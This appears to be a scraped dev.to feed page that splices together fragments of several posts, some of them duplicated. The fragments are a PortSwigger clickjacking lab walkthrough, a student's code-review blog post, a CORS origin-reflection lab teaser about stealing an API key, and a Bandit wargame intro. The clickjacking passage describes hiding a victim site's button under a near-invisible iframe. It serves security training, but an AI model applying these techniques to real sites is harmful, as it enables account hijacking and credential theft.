We need to modify the location of the CLICK ME div tag so that it is on top of the Update Email button on the vulnerable website. Note that we are setting the iframe's opacity to 0.1 to be able to check the exploit appearance and then modifying the div's top and left CSS properties so that when a logged in user clicks on the CLICK ME div on our website, they are actually clicking on the vulnerable website's button to update their email to whatever we previously set in the URL parameters. After setting the top property to 450px and the left property to 50px, it looks like the buttons are aligned to perform a successful attack. At this point, our exploit looks like this:
CLICK HERE
All we need to do is set the iframe's opacity to 0.00001 or something similar so that it is almost invisible and send the exploit to our victim.
Check out this write up on the Art Of Code: https://artofcode.tech/portswiggers-lab-write-up-clickjacking-with-a-frame-buster-script/
Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/clickjacking/clickjacking-with-a-frame-buster-script
#webdev #portswigger #clickjacking #writeup
3. Internal Code Review - 1
Reviewing code is not really my strong suit. It takes a lot of time and effort, something I lack. But I knew it was an essential tool to programmers, taking in and considering better alternatives for code, as well as optimizing it. So I had to push through, and eventually I found several errors within my first review:
Review
My first ever code review, I decided to do within my-photohub. I reviewed a fellow students code that being SerpentBytes. I tried nitpicking at the small details.
After that, I then decided to clone his code locally via the use of the HTTPS cloning and I couldn't really find anything that caught my eye. So I decided to use ESlint for any syntax. ESLint found several, one of which was an Unused import.
After I submitted what I found the author of the pull request contacted me to help him test out the new version after he had made the changes. He walked me through getting my personal access tokens. It took a while because I did not have gh_ before my token name. Which then caused me to have an error 400 being that it was an invalid request.
So after getting that sorted out, when I added the proper credentials with an access token that does begin with gh_, I finally got a passing message 200. He then asked me to check my GitHub if a repository has been created or not. When I checked, a new repository had been created in my account.
He then asked me to re-input the access token so I did as he told. It was to check whether you can use the same access token twice. Tested it out, and a new repository had been created. So it was working completely as intended.
Thoughts
It was great to work collaboratively on these issues as an open source community. I learned a lot from reviewing other people's code, and it was interesting to see how everyone tried to approach similar tasks in different ways. Overall, I hope that these reviews will help to improve the code quality in the future.
#javascript #opensource #testing #github
CLICK HERE
All we need to do is set the iframe's opacity to 0.00001 or something similar so that it is almost invisible and send the exploit to our victim.
Check out this write up on the Art Of Code: https://artofcode.tech/portswiggers-lab-write-up-clickjacking-with-a-frame-buster-script/
Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/clickjacking/clickjacking-with-a-frame-buster-script
#webdev #portswigger #clickjacking #writeup
3. Internal Code Review - 1
Reviewing code is not really my strong suit. It takes a lot of time and effort, something I lack. But I knew it was an essential tool to programmers, taking in and considering better alternatives for code, as well as optimizing it. So I had to push through, and eventually I found several errors within my first review:
Review
My first ever code review, I decided to do within my-photohub. I reviewed a fellow students code that being SerpentBytes. I tried nitpicking at the small details.
After that, I then decided to clone his code locally via the use of the HTTPS cloning and I couldn't really find anything that caught my eye. So I decided to use ESlint for any syntax. ESLint found several, one of which was an Unused import.
After I submitted what I found the author of the pull request contacted me to help him test out the new version after he had made the changes. He walked me through getting my personal access tokens. It took a while because I did not have gh_ before my token name. Which then caused me to have an error 400 being that it was an invalid request.
So after getting that sorted out, when I added the proper credentials with an access token that does begin with gh_, I finally got a passing message 200. He then asked me to check my GitHub if a repository has been created or not. When I checked, a new repository had been created in my account.
He then asked me to re-input the access token so I did as he told. It was to check whether you can use the same access token twice. Tested it out, and a new repository had been created. So it was working completely as intended.
Thoughts
It was great to work collaboratively on these issues as an open source community. I learned a lot from reviewing other people's code, and it was interesting to see how everyone tried to approach similar tasks in different ways. Overall, I hope that these reviews will help to improve the code quality in the future.
#javascript #opensource #testing #github
dev.to
Portswigger’s lab write up: CORS vulnerability with basic origin reflection
In this apprentice-level lab, we will exploit a website with a basic CORS vulnerability to obtain a user's private credentials.
Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to /accountDetails that fetches the user's API key:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7…
#webdev #portswigger #cors #writeup
Portswigger’s lab write up: CORS vulnerability with basic origin reflection
In this apprentice-level lab, we will exploit a website with a basic CORS vulnerability to obtain a user's private credentials.
Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to /accountDetails that fetches the user's API key:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7…
#webdev #portswigger #cors #writeup
dev.to
Bandit Level 0
Introduction Bandit0 is the first level of the OverTheWire Bandit wargame. In this level,...
#writeup #ctf #overthewire #bandit
Bandit Level 0
Introduction Bandit0 is the first level of the OverTheWire Bandit wargame. In this level,...
#writeup #ctf #overthewire #bandit